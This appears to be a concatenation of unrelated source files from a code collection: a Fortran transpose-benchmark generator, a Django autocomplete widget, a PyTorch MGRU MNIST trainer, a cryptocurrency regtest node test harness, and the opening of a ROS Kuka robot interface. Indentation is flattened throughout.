sizechar = str(size)
def perm(l):
sz = len(l)
if sz <= 1:
return [l]
return [p[:i]+[l[0]]+p[i:] for i in xrange(sz) for p in perm(l[1:])]
indices = ['4','3','2','1']
#all_permutations = [indices]
#transpose_list = [indices]
#loop_list = [indices]
all_permutations = perm(indices)
transpose_list = perm(indices)
loop_list = perm(indices)
print fortran_compiler+' '+fortran_opt_flags+' -c tce_sort_hirata.F'
os.system(fortran_compiler+' '+fortran_opt_flags+' -c tce_sort_hirata.F')
os.system('ar -r '+lib_name+' tce_sort_hirata.o')
print fortran_compiler+' '+fortran_opt_flags+' -c glass_correct.F'
os.system(fortran_compiler+' '+fortran_opt_flags+' -c glass_correct.F')
os.system('ar -r '+lib_name+' glass_correct.o')
print c_compiler+' '+c_opt_flags+' -c tce_sort_4kg.c'
os.system(c_compiler+' '+c_opt_flags+' -c tce_sort_4kg.c')
os.system('ar -r '+lib_name+' tce_sort_4kg.o')
print c_compiler+' '+c_opt_flags+' -c tce_sort_4kg_4321.c'
os.system(c_compiler+' '+c_opt_flags+' -c tce_sort_4kg_4321.c')
os.system('ar -r '+lib_name+' tce_sort_4kg_4321.o')
print c_compiler+' '+c_opt_flags+' -c getticks_bgp.c'
os.system(c_compiler+' '+c_opt_flags+' -c getticks_bgp.c')
os.system('ar -r '+lib_name+' getticks_bgp.o')
timer = ''
if ( timer == "ticks" ):
timer_call = "getticks()"
else:
timer_call = "rtc()"
for transpose_order in transpose_list:
dummy = 0
A = transpose_order[0]
B = transpose_order[1]
C = transpose_order[2]
D = transpose_order[3]
for loop_order in loop_list:
dummy = dummy+1
a = loop_order[0]
b = loop_order[1]
c = loop_order[2]
d = loop_order[3]
driver_name = 'transpose_'+A+B+C+D+'_loop_'+a+b+c+d
subroutine_name = 'transpose_'+A+B+C+D+'_loop_'+a+b+c+d
print driver_name
source_name = driver_name+'_driver.F'
lst_name = driver_name+'_driver.lst'
source_file = open(source_name,'w')
source_file.write(' PROGRAM ARRAYTEST\n')
#source_file.write('#include "mpif.h"\n')
source_file.write(' REAL*8 before('+ranks[0]+','+ranks[0]+','+ranks[0]+','+ranks[0]+')\n')
source_file.write(' REAL*8 after_jeff('+sizechar+')\n')
source_file.write(' REAL*8 after_hirata('+sizechar+')\n')
source_file.write(' REAL*8 after_glass('+sizechar+')\n')
source_file.write(' REAL*8 factor\n')
if ( timer == "ticks" ):
source_file.write(' INTEGER*8 Tstart,Tfinish,Thirata,Tglass,Tjeff\n')
source_file.write(' INTEGER*8 Tbest\n')
else:
source_file.write(' REAL*8 Tstart,Tfinish,Thirata,Tglass,Tjeff\n')
source_file.write(' REAL*8 Tbest\n')
source_file.write(' REAL*8 Tspeedup\n')
source_file.write(' INTEGER*4 i,j,k,l\n')
source_file.write(' INTEGER*4 aSize(4)\n')
source_file.write(' INTEGER*4 perm(4)\n')
source_file.write(' INTEGER*4 fastest(4)\n')
source_file.write(' INTEGER ierror\n')
source_file.write(' LOGICAL glass_correct\n')
source_file.write(' EXTERNAL glass_correct\n')
source_file.write(' call mpi_init(ierror)\n')
source_file.write(' call hpm_init()\n')
source_file.write(' aSize(1) = '+ranks[0]+'\n')
source_file.write(' aSize(2) = '+ranks[1]+'\n')
source_file.write(' aSize(3) = '+ranks[2]+'\n')
source_file.write(' aSize(4) = '+ranks[3]+'\n')
source_file.write(' perm(1) = '+A+'\n')
source_file.write(' perm(2) = '+B+'\n')
source_file.write(' perm(3) = '+C+'\n')
source_file.write(' perm(4) = '+D+'\n')
source_file.write(' DO 70 i = 1, '+ranks[0]+'\n')
source_file.write(' DO 60 j = 1, '+ranks[1]+'\n')
source_file.write(' DO 50 k = 1, '+ranks[2]+'\n')
source_file.write(' DO 40 l = 1, '+ranks[3]+'\n')
source_file.write(' before(i,j,k,l) = l + k*10 + j*100 + i*1000\n')
source_file.write('40 CONTINUE\n')
source_file.write('50 CONTINUE\n')
source_file.write('60 CONTINUE\n')
source_file.write('70 CONTINUE\n')
source_file.write(' factor = 1.0\n')
if ( timer == "ticks" ):
source_file.write(' Tbest=999999\n')
source_file.write(' Tstart=0\n')
source_file.write(' Tfinish=0\n')
else:
source_file.write(' Tbest=999999.0d0\n')
source_file.write(' Tstart=0.0d0\n')
source_file.write(' Tfinish=0.0d0\n')
source_file.write(' call hpm_start("tce_sort_4")\n')
source_file.write(' Tstart='+timer_call+'\n')
source_file.write(' DO 30 i = 1, '+count+'\n')
source_file.write(' CALL tce_sort_4(before, after_hirata,\n')
source_file.write(' & aSize(1), aSize(2), aSize(3), aSize(4),\n')
source_file.write(' & perm(1), perm(2), perm(3), perm(4), factor)\n')
source_file.write('30 CONTINUE\n')
source_file.write(' Tfinish='+timer_call+'\n')
source_file.write(' call hpm_stop("tce_sort_4")\n')
source_file.write(' Thirata=(Tfinish-Tstart)\n')
if ( timer == "ticks" ):
source_file.write(' Tstart=0\n')
source_file.write(' Tfinish=0\n')
else:
source_file.write(' Tstart=0.0\n')
source_file.write(' Tfinish=0.0\n')
source_file.write(' IF( ((perm(1).eq.4).and.(perm(2).eq.3)).and.\n')
source_file.write(' & ((perm(3).eq.2).and.(perm(4).eq.1)) ) THEN\n')
source_file.write(' call hpm_start("tce_sort_4kg_4321_")\n')
source_file.write(' Tstart='+timer_call+'\n')
source_file.write(' DO 31 i = 1, '+count+'\n')
source_file.write(' CALL tce_sort_4kg_4321_(before, after_glass,\n')
source_file.write(' & aSize(1), aSize(2), aSize(3), aSize(4),\n')
source_file.write(' & factor)\n')
source_file.write('31 CONTINUE\n')
source_file.write(' Tfinish='+timer_call+'\n')
source_file.write(' call hpm_stop("tce_sort_4kg_4321_")\n')
source_file.write(' ELSEIF(glass_correct(perm(1), perm(2), perm(3), perm(4))) THEN\n')
source_file.write(' call hpm_start("tce_sort_4kg_")\n')
source_file.write(' Tstart='+timer_call+'\n')
source_file.write(' DO 32 i = 1, '+count+'\n')
source_file.write(' CALL tce_sort_4kg_(before, after_glass,\n')
source_file.write(' & aSize(1), aSize(2), aSize(3), aSize(4),\n')
source_file.write(' & perm(1), perm(2), perm(3), perm(4), factor)\n')
source_file.write('32 CONTINUE\n')
source_file.write(' Tfinish='+timer_call+'\n')
source_file.write(' call hpm_stop("tce_sort_4kg_")\n')
source_file.write(' ENDIF\n')
source_file.write(' Tglass=(Tfinish-Tstart)\n')
source_file.write(' IF(glass_correct(perm(1), perm(2), perm(3), perm(4))) THEN\n')
source_file.write(' PRINT*," i after_glass(i)\n')
source_file.write(' & after_hirata(i)"\n')
source_file.write(' DO 33 i = 1, '+sizechar+'\n')
source_file.write(' IF (after_glass(i).ne.after_hirata(i)) THEN\n')
source_file.write(' PRINT*,"glass error ",i,after_glass(i),after_hirata(i)\n')
source_file.write(' ENDIF\n')
source_file.write('33 CONTINUE\n')
source_file.write(' ENDIF\n')
source_file.write(' write(6,*) "TESTING TRANPOSE TYPE '+A+B+C+D+'"\n')
source_file.write(' write(6,*) "==================="\n')
source_file.write(' write(6,*) "The compilation flags were:"\n')
for option in range(0,len(fortran_opt_flags.split())):
source_file.write(' write(6,*) "'+fortran_opt_flags.split()[option]+'"\n')
source_file.write(' write(6,*) "==================="\n')
source_file.write(' write(6,*) "Hirata Reference = ",Thirata,"seconds"\n')
source_file.write(' IF(glass_correct(perm(1), perm(2), perm(3), perm(4))) THEN\n')
source_file.write(' write(6,*) "KGlass Reference = ",Tglass,"seconds"\n')
source_file.write(' ENDIF\n')
source_file.write(' write(6,1001) "Algorithm","Jeff","Speedup","Best","Best Speedup"\n')
if ( timer == "ticks" ):
source_file.write(' Tstart=0\n')
source_file.write(' Tfinish=0\n')
else:
source_file.write(' Tstart=0.0\n')
source_file.write(' Tfinish=0.0\n')
source_file.write(' call hpm_start("'+subroutine_name+'")\n')
source_file.write(' Tstart='+timer_call+'\n')
source_file.write(' DO '+str(100+dummy)+' i = 1, '+count+'\n')
source_file.write(' CALL '+subroutine_name+'(before, after_jeff,\n')
source_file.write(' & aSize(1), aSize(2), aSize(3), aSize(4),\n')
source_file.write(' & factor)\n')
source_file.write(str(100+dummy)+' CONTINUE\n')
source_file.write(' Tfinish='+timer_call+'\n')
source_file.write(' call hpm_stop("'+subroutine_name+'")\n')
source_file.write(' Tjeff=(Tfinish-Tstart)\n')
source_file.write(' Tspeedup=(1d0*Thirata)/(1d0*Tjeff)\n')
source_file.write(' if (Tjeff<Tbest) then\n')
source_file.write(' Tbest=Tjeff\n')
source_file.write(' fastest(1)='+a+'\n')
source_file.write(' fastest(2)='+b+'\n')
source_file.write(' fastest(3)='+c+'\n')
source_file.write(' fastest(4)='+d+'\n')
source_file.write(' endif\n')
if 0 < dummy < 10:
nice_dummy=' '+str(dummy)
if 9 < dummy < 100:
nice_dummy=' '+str(dummy)
if 99 < dummy < 999:
nice_dummy=''+str(dummy)
#source_file.write(' write(6,1100) "'+nice_dummy+' Loop '+a+b+c+d+' ",\n')
#source_file.write(' & Tjeff,Tspeedup,Tbest,Thirata/Tbest\n')
source_file.write(' write(6,*) "'+nice_dummy+' Loop '+a+b+c+d+' ",\n')
source_file.write(' & Tjeff,Tspeedup,Tbest,Thirata/Tbest\n')
source_file.write(' DO '+str(500+dummy)+' i = 1, '+sizechar+'\n')
source_file.write(' IF (after_jeff(i).ne.after_hirata(i)) THEN\n')
source_file.write(' PRINT*,"jeff error ",i,after_jeff(i),after_hirata(i)\n')
source_file.write(' ENDIF\n')
source_file.write(str(500+dummy)+' CONTINUE\n')
source_file.write(' write(6,1020) "The best loop order is:",\n')
source_file.write(' & fastest(1),fastest(2),fastest(3),fastest(4)\n')
#source_file.write(' write(6,1030) "The best time is:",Tbest\n')
source_file.write(' write(6,*) "The best time is:",Tbest\n')
#source_file.write(' write(6,1030) "The best speedup is:",(1d0*Thirata)/(1d0*Tbest)\n')
source_file.write(' write(6,*) "The best speedup is:",(1d0*Thirata)/(1d0*Tbest)\n')
source_file.write(' call hpm_print()\n')
source_file.write(' call hpm_print_flops()\n')
source_file.write(' call hpm_print_flops_agg()\n')
source_file.write(' call mpi_finalize(ierror)\n')
source_file.write(' STOP\n')
source_file.write(' 1001 format(1x,a13,a12,a15,a9,a18)\n')
source_file.write(' 1020 format(1x,a30,8x,4i1)\n')
source_file.write('! 1030 format(1x,a30,d18.12)\n')
source_file.write('! 1100 format(1x,a16,4i18)\n')
source_file.write(' 911 continue\n')
source_file.write(' END\n')
source_file.close()
print fortran_linker+' '+fortran_link_flags+' '+' '+source_name+' '+lib_name+' '+' -o '+exe_dir+driver_name+'.x'
os.system(fortran_linker+' '+fortran_link_flags+' '+' '+source_name+' '+lib_name+' '+hpm_lib+' -o '+exe_dir+driver_name+'.x')
os.system('mv '+source_name+' '+src_dir)
#os.system('mv '+lst_name+' '+lst_dir)
|
py | 1a344b2813f21aa6406e608999919c9cc20ed5f7 | # -*- coding: utf-8 -*-
import six
from six.moves import urllib
from django import forms
from django.contrib.admin.sites import site
from django.contrib.admin.widgets import ForeignKeyRawIdWidget
try:
from django.templatetags import static
except ImportError:
# compatibility with django < 2.1
from django.contrib.admin.templatetags.admin_static import static
try:
from django.urls import reverse
except ImportError:
from django.core.urlresolvers import reverse
from django.template.loader import render_to_string
from django.utils.safestring import mark_safe
from django.utils.text import Truncator
class ForeignKeySearchInput(ForeignKeyRawIdWidget):
"""
Widget for displaying ForeignKeys in an autocomplete search input
instead in a <select> box.
"""
# Set in subclass to render the widget with a different template
widget_template = None
# Set this to the patch of the search view
search_path = None
def _media(self):
js_files = [
static('django_extensions/js/jquery.bgiframe.js'),
static('django_extensions/js/jquery.ajaxQueue.js'),
static('django_extensions/js/jquery.autocomplete.js'),
]
return forms.Media(
css={'all': (static('django_extensions/css/jquery.autocomplete.css'), )},
js=js_files,
)
media = property(_media)
def label_for_value(self, value):
key = self.rel.get_related_field().name
obj = self.rel.model._default_manager.get(**{key: value})
return Truncator(obj).words(14, truncate='...')
def __init__(self, rel, search_fields, attrs=None):
self.search_fields = search_fields
super(ForeignKeySearchInput, self).__init__(rel, site, attrs)
def render(self, name, value, attrs=None, renderer=None):
if attrs is None:
attrs = {}
opts = self.rel.model._meta
app_label = opts.app_label
model_name = opts.object_name.lower()
related_url = reverse('admin:%s_%s_changelist' % (app_label, model_name))
if not self.search_path:
self.search_path = urllib.parse.urljoin(related_url, 'foreignkey_autocomplete/')
params = self.url_parameters()
if params:
url = '?' + '&'.join(['%s=%s' % (k, v) for k, v in params.items()])
else:
url = ''
if 'class' not in attrs:
attrs['class'] = 'vForeignKeyRawIdAdminField'
# Call the TextInput render method directly to have more control
output = [forms.TextInput.render(self, name, value, attrs)]
if value:
label = self.label_for_value(value)
else:
label = six.u('')
context = {
'url': url,
'related_url': related_url,
'search_path': self.search_path,
'search_fields': ','.join(self.search_fields),
'app_label': app_label,
'model_name': model_name,
'label': label,
'name': name,
}
output.append(render_to_string(self.widget_template or (
'django_extensions/widgets/%s/%s/foreignkey_searchinput.html' % (app_label, model_name),
'django_extensions/widgets/%s/foreignkey_searchinput.html' % app_label,
'django_extensions/widgets/foreignkey_searchinput.html',
), context))
output.reverse()
return mark_safe(six.u('').join(output))
|
py | 1a344bedd3b9e95587abe6a3ff684e4c6f09e529 | import torch
import torch.nn as nn
import torchvision.datasets as dsets
import torchvision.transforms as transforms
from torch.autograd import Variable
from modules import MGRU
torch.manual_seed(1111)
# Hyper Parameters
sequence_length = 28
input_size = 28
hidden_size = 128
num_layers = 2
num_classes = 10
batch_size = 100
num_epochs = 2
learning_rate = 0.01
# MNIST Dataset
train_dataset = dsets.MNIST(root='../data/',
train=True,
transform=transforms.ToTensor(),
download=True)
test_dataset = dsets.MNIST(root='../data/',
train=False,
transform=transforms.ToTensor())
# Data Loader (Input Pipeline)
train_loader = torch.utils.data.DataLoader(dataset=train_dataset,
batch_size=batch_size,
shuffle=True)
test_loader = torch.utils.data.DataLoader(dataset=test_dataset,
batch_size=batch_size,
shuffle=False)
# RNN Model (Many-to-One)
class RNNModel(nn.Module):
def __init__(self, input_size, hidden_size, num_layers, num_classes, bias=True, grad_clip=None):
super(RNNModel, self).__init__()
self.hidden_size = hidden_size
self.num_layers = num_layers
self.rnn = MGRU(input_size, hidden_size, num_layers=num_layers,
bias=bias, return_sequences=False, grad_clip=grad_clip)
self.fc = nn.Linear(hidden_size, num_classes, bias=bias)
def forward(self, x):
# Set initial states
initial_states = [Variable(torch.zeros(x.size(0), self.hidden_size)) for _ in range(self.num_layers)]
# Forward propagate RNN
out = self.rnn(x, initial_states)
# Decode hidden state of last time step
out = self.fc(out)
return out
rnn = RNNModel(input_size, hidden_size, num_layers, num_classes, bias=True, grad_clip=10)
# Loss and Optimizer
criterion = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(rnn.parameters(), lr=learning_rate)
# Train the Model
for epoch in range(num_epochs):
for i, (images, labels) in enumerate(train_loader):
images = Variable(images.view(-1, sequence_length, input_size))
labels = Variable(labels)
# Forward + Backward + Optimize
optimizer.zero_grad()
outputs = rnn(images)
loss = criterion(outputs, labels)
loss.backward()
optimizer.step()
if (i+1) % 100 == 0:
print ('Epoch [%d/%d], Step [%d/%d], Loss: %.4f'
%(epoch+1, num_epochs, i+1, len(train_dataset)//batch_size, loss.data[0]))
# Test the Model
correct = 0
total = 0
for images, labels in test_loader:
images = Variable(images.view(-1, sequence_length, input_size))
outputs = rnn(images)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum()
print('Test Accuracy of the model on the 10000 test images: %d %%' % (100 * correct / total))
# Save the Model
torch.save(rnn.state_dict(), 'mgru.pkl')
|
py | 1a344c0cdeb0feaf42b25cb184d6fda583b1d69f | #!/usr/bin/env python3
# Copyright (c) 2017-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Class for merelcoind node under test"""
import contextlib
import decimal
import errno
from enum import Enum
import http.client
import json
import logging
import os
import re
import subprocess
import tempfile
import time
import urllib.parse
from .authproxy import JSONRPCException
from .util import (
append_config,
delete_cookie_file,
get_rpc_proxy,
rpc_url,
wait_until,
p2p_port,
)
# For Python 3.4 compatibility
JSONDecodeError = getattr(json, "JSONDecodeError", ValueError)
BITCOIND_PROC_WAIT_TIMEOUT = 60
class FailedToStartError(Exception):
"""Raised when a node fails to start correctly."""
class ErrorMatch(Enum):
FULL_TEXT = 1
FULL_REGEX = 2
PARTIAL_REGEX = 3
class TestNode():
"""A class for representing a merelcoind node under test.
This class contains:
- state about the node (whether it's running, etc)
- a Python subprocess.Popen object representing the running process
- an RPC connection to the node
- one or more P2P connections to the node
To make things easier for the test writer, any unrecognised messages will
be dispatched to the RPC connection."""
def __init__(self, i, datadir, *, rpchost, timewait, bitcoind, bitcoin_cli, mocktime, coverage_dir, extra_conf=None, extra_args=None, use_cli=False):
self.index = i
self.datadir = datadir
self.stdout_dir = os.path.join(self.datadir, "stdout")
self.stderr_dir = os.path.join(self.datadir, "stderr")
self.rpchost = rpchost
self.rpc_timeout = timewait
self.binary = bitcoind
self.coverage_dir = coverage_dir
if extra_conf != None:
append_config(datadir, extra_conf)
# Most callers will just need to add extra args to the standard list below.
# For those callers that need more flexibility, they can just set the args property directly.
# Note that common args are set in the config file (see initialize_datadir)
self.extra_args = extra_args
self.args = [
self.binary,
"-datadir=" + self.datadir,
"-logtimemicros",
"-debug",
"-debugexclude=libevent",
"-debugexclude=leveldb",
"-mocktime=" + str(mocktime),
"-uacomment=testnode%d" % i
]
self.cli = TestNodeCLI(bitcoin_cli, self.datadir)
self.use_cli = use_cli
self.running = False
self.process = None
self.rpc_connected = False
self.rpc = None
self.url = None
self.log = logging.getLogger('TestFramework.node%d' % i)
self.cleanup_on_exit = True # Whether to kill the node when this object goes away
self.p2ps = []
def get_deterministic_priv_key(self):
"""Return a deterministic priv key in base58, that only depends on the node's index"""
PRIV_KEYS = [
# adress , privkey
('mjTkW3DjgyZck4KbiRusZsqTgaYTxdSz6z', 'cVpF924EspNh8KjYsfhgY96mmxvT6DgdWiTYMtMjuM74hJaU5psW'),
('msX6jQXvxiNhx3Q62PKeLPrhrqZQdSimTg', 'cUxsWyKyZ9MAQTaAhUQWJmBbSvHMwSmuv59KgxQV7oZQU3PXN3KE'),
('mnonCMyH9TmAsSj3M59DsbH8H63U3RKoFP', 'cTrh7dkEAeJd6b3MRX9bZK8eRmNqVCMH3LSUkE3dSFDyzjU38QxK'),
('mqJupas8Dt2uestQDvV2NH3RU8uZh2dqQR', 'cVuKKa7gbehEQvVq717hYcbE9Dqmq7KEBKqWgWrYBa2CKKrhtRim'),
('msYac7Rvd5ywm6pEmkjyxhbCDKqWsVeYws', 'cQDCBuKcjanpXDpCqacNSjYfxeQj8G6CAtH1Dsk3cXyqLNC4RPuh'),
('n2rnuUnwLgXqf9kk2kjvVm8R5BZK1yxQBi', 'cQakmfPSLSqKHyMFGwAqKHgWUiofJCagVGhiB4KCainaeCSxeyYq'),
('myzuPxRwsf3vvGzEuzPfK9Nf2RfwauwYe6', 'cQMpDLJwA8DBe9NcQbdoSb1BhmFxVjWD5gRyrLZCtpuF9Zi3a9RK'),
('mumwTaMtbxEPUswmLBBN3vM9oGRtGBrys8', 'cSXmRKXVcoouhNNVpcNKFfxsTsToY5pvB9DVsFksF1ENunTzRKsy'),
('mpV7aGShMkJCZgbW7F6iZgrvuPHjZjH9qg', 'cSoXt6tm3pqy43UMabY6eUTmR3eSUYFtB2iNQDGgb3VUnRsQys2k'),
]
return PRIV_KEYS[self.index]
def _node_msg(self, msg: str) -> str:
"""Return a modified msg that identifies this node by its index as a debugging aid."""
return "[node %d] %s" % (self.index, msg)
def _raise_assertion_error(self, msg: str):
"""Raise an AssertionError with msg modified to identify this node."""
raise AssertionError(self._node_msg(msg))
def __del__(self):
# Ensure that we don't leave any bitcoind processes lying around after
# the test ends
if self.process and self.cleanup_on_exit:
# Should only happen on test failure
# Avoid using logger, as that may have already been shutdown when
# this destructor is called.
print(self._node_msg("Cleaning up leftover process"))
self.process.kill()
def __getattr__(self, name):
"""Dispatches any unrecognised messages to the RPC connection or a CLI instance."""
if self.use_cli:
return getattr(self.cli, name)
else:
assert self.rpc_connected and self.rpc is not None, self._node_msg("Error: no RPC connection")
return getattr(self.rpc, name)
def start(self, extra_args=None, *, stdout=None, stderr=None, **kwargs):
"""Start the node."""
if extra_args is None:
extra_args = self.extra_args
# Add a new stdout and stderr file each time bitcoind is started
if stderr is None:
stderr = tempfile.NamedTemporaryFile(dir=self.stderr_dir, delete=False)
if stdout is None:
stdout = tempfile.NamedTemporaryFile(dir=self.stdout_dir, delete=False)
self.stderr = stderr
self.stdout = stdout
# Delete any existing cookie file -- if such a file exists (eg due to
# unclean shutdown), it will get overwritten anyway by bitcoind, and
# potentially interfere with our attempt to authenticate
delete_cookie_file(self.datadir)
# add environment variable LIBC_FATAL_STDERR_=1 so that libc errors are written to stderr and not the terminal
subp_env = dict(os.environ, LIBC_FATAL_STDERR_="1")
self.process = subprocess.Popen(self.args + extra_args, env=subp_env, stdout=stdout, stderr=stderr, **kwargs)
self.running = True
self.log.debug("merelcoind started, waiting for RPC to come up")
def wait_for_rpc_connection(self):
"""Sets up an RPC connection to the merelcoind process. Returns False if unable to connect."""
# Poll at a rate of four times per second
poll_per_s = 4
for _ in range(poll_per_s * self.rpc_timeout):
if self.process.poll() is not None:
raise FailedToStartError(self._node_msg(
'merelcoind exited with status {} during initialization'.format(self.process.returncode)))
try:
self.rpc = get_rpc_proxy(rpc_url(self.datadir, self.index, self.rpchost), self.index, timeout=self.rpc_timeout, coveragedir=self.coverage_dir)
self.rpc.getblockcount()
# If the call to getblockcount() succeeds then the RPC connection is up
self.rpc_connected = True
self.url = self.rpc.url
self.log.debug("RPC successfully started")
return
except IOError as e:
if e.errno != errno.ECONNREFUSED: # Port not yet open?
raise # unknown IO error
except JSONRPCException as e: # Initialization phase
if e.error['code'] != -28: # RPC in warmup?
raise # unknown JSON RPC exception
except ValueError as e: # cookie file not found and no rpcuser or rpcassword. bitcoind still starting
if "No RPC credentials" not in str(e):
raise
time.sleep(1.0 / poll_per_s)
self._raise_assertion_error("Unable to connect to merelcoind")
def get_wallet_rpc(self, wallet_name):
if self.use_cli:
return self.cli("-rpcwallet={}".format(wallet_name))
else:
assert self.rpc_connected and self.rpc, self._node_msg("RPC not connected")
wallet_path = "wallet/{}".format(urllib.parse.quote(wallet_name))
return self.rpc / wallet_path
def stop_node(self, expected_stderr=''):
"""Stop the node."""
if not self.running:
return
self.log.debug("Stopping node")
try:
self.stop()
except http.client.CannotSendRequest:
self.log.exception("Unable to stop node.")
# Check that stderr is as expected
self.stderr.seek(0)
stderr = self.stderr.read().decode('utf-8').strip()
if stderr != expected_stderr:
raise AssertionError("Unexpected stderr {} != {}".format(stderr, expected_stderr))
self.stdout.close()
self.stderr.close()
del self.p2ps[:]
def is_node_stopped(self):
"""Checks whether the node has stopped.
Returns True if the node has stopped. False otherwise.
This method is responsible for freeing resources (self.process)."""
if not self.running:
return True
return_code = self.process.poll()
if return_code is None:
return False
# process has stopped. Assert that it didn't return an error code.
assert return_code == 0, self._node_msg(
"Node returned non-zero exit code (%d) when stopping" % return_code)
self.running = False
self.process = None
self.rpc_connected = False
self.rpc = None
self.log.debug("Node stopped")
return True
def wait_until_stopped(self, timeout=BITCOIND_PROC_WAIT_TIMEOUT):
wait_until(self.is_node_stopped, timeout=timeout)
@contextlib.contextmanager
def assert_debug_log(self, expected_msgs):
debug_log = os.path.join(self.datadir, 'regtest', 'debug.log')
with open(debug_log, encoding='utf-8') as dl:
dl.seek(0, 2)
prev_size = dl.tell()
try:
yield
finally:
with open(debug_log, encoding='utf-8') as dl:
dl.seek(prev_size)
log = dl.read()
print_log = " - " + "\n - ".join(log.splitlines())
for expected_msg in expected_msgs:
if re.search(re.escape(expected_msg), log, flags=re.MULTILINE) is None:
self._raise_assertion_error('Expected message "{}" does not partially match log:\n\n{}\n\n'.format(expected_msg, print_log))
def assert_start_raises_init_error(self, extra_args=None, expected_msg=None, match=ErrorMatch.FULL_TEXT, *args, **kwargs):
"""Attempt to start the node and expect it to raise an error.
extra_args: extra arguments to pass through to merelcoind
expected_msg: regex that stderr should match when merelcoind fails
Will throw if merelcoind starts without an error.
Will throw if an expected_msg is provided and it does not match merelcoind's stdout."""
with tempfile.NamedTemporaryFile(dir=self.stderr_dir, delete=False) as log_stderr, \
tempfile.NamedTemporaryFile(dir=self.stdout_dir, delete=False) as log_stdout:
try:
self.start(extra_args, stdout=log_stdout, stderr=log_stderr, *args, **kwargs)
self.wait_for_rpc_connection()
self.stop_node()
self.wait_until_stopped()
except FailedToStartError as e:
self.log.debug('merelcoind failed to start: %s', e)
self.running = False
self.process = None
# Check stderr for expected message
if expected_msg is not None:
log_stderr.seek(0)
stderr = log_stderr.read().decode('utf-8').strip()
if match == ErrorMatch.PARTIAL_REGEX:
if re.search(expected_msg, stderr, flags=re.MULTILINE) is None:
self._raise_assertion_error(
'Expected message "{}" does not partially match stderr:\n"{}"'.format(expected_msg, stderr))
elif match == ErrorMatch.FULL_REGEX:
if re.fullmatch(expected_msg, stderr) is None:
self._raise_assertion_error(
'Expected message "{}" does not fully match stderr:\n"{}"'.format(expected_msg, stderr))
elif match == ErrorMatch.FULL_TEXT:
if expected_msg != stderr:
self._raise_assertion_error(
'Expected message "{}" does not fully match stderr:\n"{}"'.format(expected_msg, stderr))
else:
if expected_msg is None:
assert_msg = "merelcoind should have exited with an error"
else:
assert_msg = "merelcoind should have exited with expected error " + expected_msg
self._raise_assertion_error(assert_msg)
def node_encrypt_wallet(self, passphrase):
""""Encrypts the wallet.
This causes merelcoind to shutdown, so this method takes
care of cleaning up resources."""
self.encryptwallet(passphrase)
self.wait_until_stopped()
def add_p2p_connection(self, p2p_conn, *, wait_for_verack=True, **kwargs):
"""Add a p2p connection to the node.
This method adds the p2p connection to the self.p2ps list and also
returns the connection to the caller."""
if 'dstport' not in kwargs:
kwargs['dstport'] = p2p_port(self.index)
if 'dstaddr' not in kwargs:
kwargs['dstaddr'] = '127.0.0.1'
p2p_conn.peer_connect(**kwargs)()
self.p2ps.append(p2p_conn)
if wait_for_verack:
p2p_conn.wait_for_verack()
return p2p_conn
@property
def p2p(self):
"""Return the first p2p connection
Convenience property - most tests only use a single p2p connection to each
node, so this saves having to write node.p2ps[0] many times."""
assert self.p2ps, self._node_msg("No p2p connection")
return self.p2ps[0]
def disconnect_p2ps(self):
"""Close all p2p connections to the node."""
for p in self.p2ps:
p.peer_disconnect()
del self.p2ps[:]
class TestNodeCLIAttr:
def __init__(self, cli, command):
self.cli = cli
self.command = command
def __call__(self, *args, **kwargs):
return self.cli.send_cli(self.command, *args, **kwargs)
def get_request(self, *args, **kwargs):
return lambda: self(*args, **kwargs)
class TestNodeCLI():
"""Interface to merelcoin-cli for an individual node"""
def __init__(self, binary, datadir):
self.options = []
self.binary = binary
self.datadir = datadir
self.input = None
self.log = logging.getLogger('TestFramework.bitcoincli')
def __call__(self, *options, input=None):
# TestNodeCLI is callable with bitcoin-cli command-line options
cli = TestNodeCLI(self.binary, self.datadir)
cli.options = [str(o) for o in options]
cli.input = input
return cli
def __getattr__(self, command):
return TestNodeCLIAttr(self, command)
def batch(self, requests):
results = []
for request in requests:
try:
results.append(dict(result=request()))
except JSONRPCException as e:
results.append(dict(error=e))
return results
def send_cli(self, command=None, *args, **kwargs):
"""Run merelcoin-cli command. Deserializes returned string as python object."""
pos_args = [str(arg).lower() if type(arg) is bool else str(arg) for arg in args]
named_args = [str(key) + "=" + str(value) for (key, value) in kwargs.items()]
assert not (pos_args and named_args), "Cannot use positional arguments and named arguments in the same merelcoin-cli call"
p_args = [self.binary, "-datadir=" + self.datadir] + self.options
if named_args:
p_args += ["-named"]
if command is not None:
p_args += [command]
p_args += pos_args + named_args
self.log.debug("Running merelcoin-cli command: %s" % command)
process = subprocess.Popen(p_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
cli_stdout, cli_stderr = process.communicate(input=self.input)
returncode = process.poll()
if returncode:
match = re.match(r'error code: ([-0-9]+)\nerror message:\n(.*)', cli_stderr)
if match:
code, message = match.groups()
raise JSONRPCException(dict(code=int(code), message=message))
# Ignore cli_stdout, raise with cli_stderr
raise subprocess.CalledProcessError(returncode, self.binary, output=cli_stderr)
try:
return json.loads(cli_stdout, parse_float=decimal.Decimal)
except JSONDecodeError:
return cli_stdout.rstrip("\n")
|
py | 1a344e2bf9eb4ab928babc8fcb78a7377e160851 | #!/usr/bin/env python
# You must run `export ROS_NAMESPACE=/iiwa` in the terminal before running this script
import sys
import copy
import rospy
import moveit_commander
from geometry_msgs.msg import PoseStamped
from sensor_msgs.msg import JointState
import numpy as np
from moveit_msgs.msg import RobotState, Constraints, OrientationConstraint
from sensor_msgs.msg import Image
import cv2
from cv_bridge import CvBridge, CvBridgeError
from os.path import join
import os
import random
class KukaInterface ():
def __init__(self):
self.bridge = CvBridge()
joint_state_topic = ['joint_states:=/iiwa/joint_states']
moveit_commander.roscpp_initialize(joint_state_topic)
rospy.Subscriber("/iiwa/joint_states", JointState, self.State_callback)
# Instantiate a RobotCommander object. This object is
# an interface to the robot as a whole.
self.robot = moveit_commander.RobotCommander()
self.group = moveit_commander.MoveGroupCommander("manipulator")
# rospy.sleep(2)
# self.scene = moveit_commander.PlanningSceneInterface('/iiwa/move_group/monitored_planning_scene')
# box_pose = PoseStamped()
# box_pose.header.frame_id = "world"
# box_pose.pose.position.x = 1.0
# box_pose.pose.orientation.w = 1.0
# self.scene.add_box("test", box_pose, size=(0.1, 0.2, 0.3))
# while not rospy.is_shutdown():
# rospy.sleep(1.0)
# for k in self.scene.__dict__.keys():
